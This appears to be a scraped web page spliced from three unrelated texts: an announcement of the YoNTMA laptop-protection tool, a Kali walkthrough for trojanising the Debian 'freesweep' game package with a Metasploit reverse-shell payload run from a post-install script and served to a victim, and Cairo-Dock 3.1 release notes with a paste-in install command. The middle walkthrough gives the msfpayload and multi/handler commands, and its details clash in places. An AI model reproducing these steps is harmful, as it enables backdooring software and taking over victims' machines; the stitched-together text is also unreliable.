You're a responsible defender of your data. You keep all of your disks encrypted. You hibernate your laptop when you're not using it to keep any sensitive data out of RAM. You're known by friends, family, and colleagues as a tireless crusader against data theft. But do you hibernate your laptop when you visit a co-worker's office for a few minutes? What about when you get up to use the bathroom? What happens if a thief snatches your laptop while it's locked, but still powered on? The encryption keys are still in memory, which makes them vulnerable to DMA or cold boot attacks. Once the thief has the data encryption keys, they effectively have physical access to an unencrypted laptop, which means game over for your data.
Enter YoNTMA ! YoNTMA (You'll Never Take Me Alive!) is a tool designed to enhance the protection of encrypted data. YoNTMA runs as a background service and begins monitoring your computer any time the screen is locked. If the power cable or Ethernet cable is disconnected from the system while your laptop is locked, YoNTMA will immediately hibernate the machine to ensure that the disk encryption keys do not remain in RAM. This ensures that if a thief walks off with your powered-on laptop, your encrypted data stays protected.
iSEC Partners is pleased to announce the first public release of YoNTMA. The project is hosted on GitHub at the following URL
Try it out and let us know what features you'd like to see or any other feedback you have on the Issues page.
We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package 'freesweep', a text-based version of Mine Sweeper.
root@kali:~# apt-get --download-only install freesweep Reading package lists... Done Building dependency tree Reading state information... Done ...snip... root@kali:~# mkdir /tmp/evil root@kali:~# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil root@kali:~# cd /tmp/evil/ root@kali:/tmp/evil#
Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added "features".
root@kali:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work root@kali:/tmp/evil# mkdir work/DEBIAN
In the 'DEBIAN' directory, create a file named 'control' that contains the following:
root@kali:/tmp/evil/work/DEBIAN# nano control
Package: freesweep Version: 0.90-1 Section: Games and Amusement Priority: optional Architecture: i386 Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com) Description: a text-based minesweeper
We also need to create a post-installation script that will execute our binary. In our 'DEBIAN', we'll create a file named 'postinst' that contains the following:
Now we'll create our malicious payload. We'll be creating a reverse shell to connect back to us named 'freesweep_scores'.
root@kali:~# msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.105 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/shell/reverse_tcp Length: 50 Options: LHOST=192.168.1.101,LPORT=443
We'll now make our post-installation script executable and build our new package. The built file will be named 'work.deb' so we will want to change that to 'freesweep.deb' and copy the package to our web root directory.
If it is not already running, we'll need to start the Apache web server.
root@kali:/tmp/evil# service apache2 start
We will need to set up the Metasploit multi/handler to receive the incoming connection.
root@kali:~# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.105 LPORT=443 E [*] Please wait while we load the module tree... [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler...
On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game.
Cairo-Dock is a pretty, fast and customizable desktop interface. You can see it as a good alternative/addition to Unity, Gnome-Shell, Xfce-panel, KDE-panel, etc Here is a short summary of the improvements and new features in this version 3.1. Cairo-Dock sits in the centre of your desktop, allowing you to monitor and control your favourite apps: music players, chat messengers, twitter, torrents downloaders, RSS feeds, calendar/tasks, weather, mail checkers, etc, and a powerful taskbar.
Cairo Dock includes many plugins/applets such as: weather, clock, Messaging Menu, system monitor, keyboard indicators, custom icons, notification area, clipboard manager, and many other plugins.
What's New in Cairo Dock? Main Changes:
Better integration of Unity: support of the Launcher API and better support of indicators
All configuration windows have been merged into a single one.
Added progress bars in several applets and in the Dbus API
The Music Player applet can control players in the systray.
Icons of the taskbar can be separated from launchers or not
The advanced mode of the configuration panel has been improved (thanks to SQP!)
Messaging Menu has been rewritten for newer versions and two new 'indicator' applets have been added:
Printers-Menu: it shows active print jobs.
and Sync-Menu: e.g. on Ubuntu 12.10, it collects status information data from processes that involve some form of synchronisation with servers; such as about apps like Ubuntu One.
various bug fixes and improvements
Core:
The dock now supports XRandr which should replace Xinerama and help the dock to manage multi-monitors.
Progress bars can now be customised (in the advanced mode of the configuration panel / 'Indicators' module).
We can drop .sh files into the dock to quickly create a new launcher.
The "Lock icons position" now only block the icons position but we can still add new launchers/files from the menu/file manager.
QuickList menu entries are now translated if it's available.
We can now launch the dock with '-W' (--metacity-workaround) option which is a workaround for window managers (e.g. Metacity) not handling the opacity correctly (if your subdock/dock/dialogues are invisible).
Window's actions have been merged into a single menu entry (right-click menu).
The default view now use all the screen space to avoid the jitter of the dock when it is resized (visible only if your window manager doesn't resize it correctly).
Labels in vertical dock now ends with a gradation.
The dock now supports animated images with variable rate (have a look to the new 'Busy' animation when the Weather applet is downloading data or when you're uploading files with the 'Drop to Share' applet).
Plug-ins:
Clock: We can now easily add a new task by doing a right click on the calendar.
Drop to Share: Supported text files (now it uploads the content of text files to servers like pastebin).
Applications Menu: used gio to launch the menu entries, so that the event is stored in Zeitgeist.
Mail: Improved the look of the icon and its dialogue.
MusicPlayer: Prevented displaying quicklists, since the applet already provides all the common actions for any player.
Notification Area: displayed the title, the label and the description (if they are available) on the label of the icon.
PowerManager: displayed the details of all batteries (and not only the first one) and modify the icon if the battery is removed/added.
QuickBrowser: Added drag support (e.g. to quickly drop file into GMail in order to join this file to the mail).
Recent-Events: prevented double entries in the menu list and unavailable files.
Recent Events: added recent applications.
Shortcuts: added the possibility to launch nautilus-connect-server from its menu
Shortcuts: Move 'Home' directory to the bookmark list
Stack: it now supports all URI extensions, not only files from the file system but also files from servers or even from the trash.
Switcher: Added new options and modify the lists of options. Now we can have a very simple drawing (like Swichter applet of the Gnome-Panel).
Added an option to have progress bars in a few applet (Sound Control, Wifi, PowerManager, etc.).
Other Changes:
A new 'third-party' applet is available: YoutubeDL to easily download Youtube videos (thanks to Brian).
Twitter applet now supports Identi.ca.
3 new themes are available.
The code has been cleaned in order to remove most warnings when we compile it with -Wall (and -Wextra for the core).
Translations have been updated.
Installation with one copy-paste
If you don't want to learn more about the installation or if you want a quick install of the dock, copy-paste all this box in a terminal (Note: The 2nd line is long and is maybe displayed as 2 lines on the page, but it's a single line.)
sudo -v
Please write your password (it's invisible )
echo "deb http://download.tuxfamily.org/glxdock/repository/ubuntu $(lsb_release -sc) cairo-dock" | sudo tee -a /etc/apt/sources.list
